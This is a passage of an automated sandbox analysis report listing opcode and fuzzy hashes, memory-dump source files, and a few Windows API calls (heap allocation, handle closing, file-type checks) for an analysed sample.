                                          • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                          • Instruction ID: f5114f49e7f24e79e9f229e31b82f51fca4591d100d1c70a44b2286a9c8c229c
                                          • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                          • Instruction Fuzzy Hash: 54F04955B0A20745FE547A6E99122F492907F7FB80FD85430CF4FCA3A9EE2CAA814230
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                          • Instruction ID: 149675e1417fb860891826fffe6b6312b2e53e9f272e674c09c7b58b80bd49c3
                                          • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                          • Instruction Fuzzy Hash: 63F03A50E0A24B44FF147ABE58112F492907F6E7A0FC81630DF6FCA2E9DE1CA4409130
                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF7BB24207E), ref: 00007FF7BB2420F6
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                          • Instruction ID: 6a4d6b3dd631a2365c8625d8299033fc491d982832264e4c6243f8c6b9596b69
                                          • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                          • Instruction Fuzzy Hash: 95F0A921A1854245FB249B3DD4413B9A660F726B78F884334DF3C055E9CF28D8958720
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: FileType
                                          • String ID:
                                          • API String ID: 3081899298-0
                                          • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                          • Instruction ID: 1088ee19880b8a70c13581687e66d79f9d69ce7df2274c89c0f667b127b323a2
                                          • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                          • Instruction Fuzzy Hash: 24D01216E1984182DD10A73F98510BC6350FFA3735FE40B30DB3E82AF5CE1D9496A325